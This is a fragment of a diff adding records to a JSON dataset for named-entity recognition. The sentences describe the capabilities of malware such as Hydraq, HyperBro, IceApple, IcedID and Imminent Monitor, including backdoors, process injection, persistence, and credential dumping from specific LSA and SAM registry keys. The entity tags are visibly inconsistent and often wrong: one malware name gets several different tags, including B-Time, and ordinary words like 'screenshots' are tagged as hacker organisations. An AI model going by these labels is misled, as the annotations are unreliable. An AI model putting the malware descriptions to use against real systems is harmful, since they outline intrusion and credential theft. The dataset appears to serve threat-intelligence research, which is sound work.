"O" + ] + }, + { + "tokens": [ + "HotCroissant", + "can", + "remotely", + "open", + "applications", + "on", + "the", + "infected", + "host", + "with", + "the", + "<code>ShellExecuteA</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "adjust", + "token", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "clear", + "all", + "system", + "event", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "read", + "data", + "from", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "connects", + "to", + "a", + "predefined", + "domain", + "on", + "port", + "443", + "to", + "exfil", + "gathered", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "check", + "for", + "the", + "existence", + "of", + "files,", + "including", + "its", + "own", + "components,", + "as", + "well", + "as", + "retrieve", + "a", + "list", + "of", + "logical", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "download", + "files", + "and", + "additional", + "malware", + "components." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "Registry", + "subkey", + "to", + "register", + "its", + "created", + "service,", + "and", + "can", + "also", + "uninstall", + "itself", + "later", + "by", + "deleting", + "this", + "value.", + "Hydraq's", + "backdoor", + "also", + "enables", + "remote", + "attackers", + "to", + "modify", + "and", + "delete", + "subkeys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "uses", + "basic", + "obfuscation", + "in", + "the", + "form", + "of", + "spaghetti", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "monitor", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "system", + "information,", + "such", + "as", + "CPU", + "speed,", + "from", + "Registry", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "includes", + "a", + "component", + "based", + "on", + "the", + "code", + "of", + "VNC", + "that", + "can", + "stream", + "a", + "live", + "feed", + "of", + "the", + "desktop", + "of", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "uses", + "svchost.exe", + "to", + "execute", + "a", + "malicious", + "DLL", + "included", + "in", + "a", + "new", + "service", + "group." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "load", + "and", + "call", + "DLL", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "C2", + "traffic", + "is", + "encrypted", + "using", + "bitwise", + "NOT", + "and", + "XOR", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "information", + "such", + "as", + "computer", + "name,", + "OS", + "version,", + "processor", + "speed,", + "memory", + "size,", + "and", + "CPU", + "speed." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "IP", + "addresses", + "of", + "compromised", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "monitor", + "services." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Hydraq", + "creates", + "new", + "services", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "used", + "a", + "legitimate", + "application", + "to", + "sideload", + "a", + "DLL", + "to", + "decrypt,", + "decompress,", + "and", + "run", + "a", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "can", + "unpack", + "and", + "decrypt", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "can", + "be", + "delivered", + "encrypted", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "the", + "ability", + "to", + "delete", + "a", + "specified", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "the", + "ability", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "the", + "ability", + "to", + "run", + "an", + "application", + "(<code>CreateProcessW</code>)", + "or", + "script/file", + "(<code>ShellExecuteW</code>)", + "via", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "can", + "run", + "shellcode", + "it", + "injects", + "into", + "a", + "newly", + "created", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "the", + "ability", + "to", + "take", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "the", + "ability", + "to", + "start", + "and", + "stop", + "a", + "specified", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "the", + "ability", + "to", + "pack", + "its", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "can", + "list", + "all", + "services", + "and", + "their", + "configurations." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperBro", + "has", + "used", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperStack", + "can", + "use", + "default", + "credentials", + "to", + "connect", + "to", + "IPC$", + "shares", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperStack", + "can", + "connect", + "to", + "the", + "IPC$", + "share", + "on", + "remote", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperStack", + "can", + "enumerate", + "all", + "account", + "names", + "on", + "a", + "remote", + "share." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperStack", + "can", + "add", + "the", + "name", + "of", + "its", + "communication", + "pipe", + "to", + "<code>HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperStack", + "can", + "use", + "Windows", + "API's", + "<code>ConnectNamedPipe</code>", + "and", + "<code>WNetAddConnection2</code>", + "to", + "detect", + "incoming", + "connections", + "and", + "connect", + "to", + "remote", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HyperStack", + "has", + "used", + "RSA", + "encryption", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ISMInjector", + "uses", + "the", + "<code>certutil</code>", + "command", + "to", + "decode", + "a", + "payload", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ISMInjector", + "is", + "obfuscated", + "with", + "the", + "off-the-shelf", + "SmartAssembly", + ".NET", + "obfuscator", + "created", + "by", + "red-gate.com." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ISMInjector", + "hollows", + "out", + "a", + "newly", + "created", + "process", + "RegASM.exe", + "and", + "injects", + "its", + "payload", + "into", + "the", + "hollowed", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ISMInjector", + "creates", + "scheduled", + "tasks", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "encrypt", + "and", + "compress", + "files", + "using", + "Gzip", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "use", + "Base64", + "and", + "\"junk\"", + "JavaScript", + "code", + "to", + "obfuscate", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "harvest", + "credentials", + "from", + "local", + "and", + "remote", + "host", + "registries." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "collect", + "files,", + "passwords,", + "and", + "other", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "use", + "a", + "Base64-encoded", + "AES", + "key", + "to", + "decrypt", + "tasking." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "IceApple", + "Active", + "Directory", + "Querier", + "module", + "can", + "perform", + "authenticated", + "requests", + "against", + "an", + "Active", + "Directory", + "server." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple's", + "Multi", + "File", + "Exfiltrator", + "module", + "can", + "exfiltrate", + "multiple", + "files", + "from", + "a", + "compromised", + "host", + "as", + "an", + "HTTP", + "response", + "over", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "delete", + "files", + "and", + "directories", + "from", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "IceApple", + "Directory", + "Lister", + "module", + "can", + "list", + "information", + "about", + "files", + "and", + "directories", + "including", + "creation", + "time,", + "last", + "write", + "time,", + "name,", + "and", + "size." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "is", + "an", + "IIS", + "post-exploitation", + "framework,", + "consisting", + "of", + "18", + "modules", + "that", + "provide", + "several", + "functionalities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple's", + "Credential", + "Dumper", + "module", + "can", + "dump", + "LSA", + "secrets", + "from", + "registry", + "keys,", + "including:", + "`HKLM\\SECURITY\\Policy\\PolEKList\\default`,", + "`HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`,", + "and", + "`HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + ".NET", + "assemblies", + "have", + "used", + "`App_Web_`", + "in", + "their", + "file", + "names", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "use", + "reflective", + "code", + "loading", + "to", + "load", + ".NET", + "assemblies", + "into", + "`MSExchangeOWAAppPool`", + "on", + "targeted", + "Exchange", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IceApple's", + "Credential", + "Dumper", + "module", + "can", + "dump", + "encrypted", + "password", + "hashes", + "from", + "SAM", + "registry", + "keys,", + "including", + "`HKLM\\SAM\\SAM\\Domains\\Account\\F`", + "and", + "`HKLM\\SAM\\SAM\\Domains\\Account\\Users\\*\\V`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "IceApple", + "Result", + "Retriever", + "module", + "can", + "AES", + "encrypt", + "C2", + "responses." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "IceApple", + "Server", + "Variable", + "Dumper", + "module", + "iterates", + "over", + "all", + "server", + "variables", + "present", + "for", + "the", + "current", + "request", + "and", + "returns", + "them", + "to", + "the", + "adversary." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "IceApple", + "ifconfig", + "module", + "can", + "iterate", + "over", + "all", + "network", + "interfaces", + "on", + "the", + "host", + "and", + "retrieve", + "the", + "name,", + "description,", + "MAC", + "address,", + "DNS", + "suffix,", + "DNS", + "servers,", + "gateways,", + "IPv4", + "addresses,", + "and", + "subnet", + "masks." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "IceApple", + "OWA", + "credential", + "logger", + "can", + "monitor", + "for", + "OWA", + "authentication", + "requests", + "and", + "log", + "the", + "credentials." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "IceApple", + "can", + "use", + "HTTP", + "GET", + "to", + "request", + "and", + "pull", + "information", + "from", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "used", + "SSL", + "and", + "TLS", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "used", + "<code>ZwQueueApcThread</code>", + "to", + "inject", + "itself", + "into", + "remote", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "used", + "web", + "injection", + "attacks", + "to", + "redirect", + "victims", + "to", + "spoofed", + "sites", + "designed", + "to", + "harvest", + "banking", + "and", + "other", + "credentials.", + "IcedID", + "can", + "use", + "a", + "self", + "signed", + "TLS", + "certificate", + "in", + "connection", + "with", + "the", + "spoofed", + "site", + "and", + "simultaneously", + "maintains", + "a", + "live", + "connection", + "with", + "the", + "legitimate", + "site", + "to", + "display", + "the", + "correct", + "URL", + "and", + "certificates", + "in", + "the", + "browser." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "can", + "query", + "LDAP", + "to", + "identify", + "additional", + "users", + "on", + "the", + "network", + "to", + "infect." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "utilzed", + "encrypted", + "binaries", + "and", + "base64", + "encoded", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "the", + "ability", + "to", + "download", + "additional", + "modules", + "and", + "a", + "configuration", + "file", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "been", + "executed", + "through", + "Word", + "documents", + "with", + "malicious", + "embedded", + "macros." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "can", + "inject", + "itself", + "into", + "a", + "suspended", + "msiexec.exe", + "process", + "to", + "send", + "beacons", + "to", + "C2", + "while", + "appearing", + "as", + "a", + "normal", + "msi", + "application." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "called", + "<code>ZwWriteVirtualMemory</code>,", + "<code>ZwProtectVirtualMemory</code>,", + "<code>ZwQueueApcThread</code>,", + "and", + "<code>NtResumeThread</code>", + "to", + "inject", + "itself", + "into", + "a", + "remote", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "the", + "ability", + "to", + "identify", + "Workgroup", + "membership." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "established", + "persistence", + "by", + "creating", + "a", + "Registry", + "run", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "created", + "a", + "scheduled", + "task", + "that", + "executes", + "every", + "hour", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "packed", + "and", + "encrypted", + "its", + "loader", + "module." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "been", + "delivered", + "via", + "phishing", + "e-mails", + "with", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "embedded", + "binaries", + "within", + "RC4", + "encrypted", + ".png", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "the", + "ability", + "to", + "identify", + "the", + "computer", + "name", + "and", + "OS", + "version", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "used", + "obfuscated", + "VBA", + "string", + "expressions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "used", + "HTTPS", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IcedID", + "has", + "used", + "WMI", + "to", + "execute", + "binaries." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "remote", + "microphone", + "monitoring", + "capability." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "CommandPromptPacket", + "and", + "ScriptPacket", + "module(s)", + "for", + "creating", + "a", + "remote", + "shell", + "and", + "executing", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "PasswordRecoveryPacket", + "module", + "for", + "recovering", + "browser", + "passwords." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "decoded", + "malware", + "components", + "that", + "are", + "then", + "dropped", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "feature", + "to", + "disable", + "Windows", + "Task", + "Manager." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "uploaded", + "a", + "file", + "containing", + "debugger", + "logs,", + "network", + "information", + "and", + "system", + "information", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "deleted", + "files", + "related", + "to", + "its", + "dynamic", + "debugger", + "feature." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "dynamic", + "debugging", + "feature", + "to", + "check", + "whether", + "it", + "is", + "located", + "in", + "the", + "%TEMP%", + "directory,", + "otherwise", + "it", + "copies", + "itself", + "there." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "dynamic", + "debugging", + "feature", + "to", + "set", + "the", + "file", + "attribute", + "to", + "hidden." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "keylogging", + "module." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "leveraged", + "CreateProcessW()", + "call", + "to", + "execute", + "the", + "debugger." + ], + "ner_tags": [ + "B-Time", + "B-SecTeam", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "encrypted", + "the", + "spearphish", 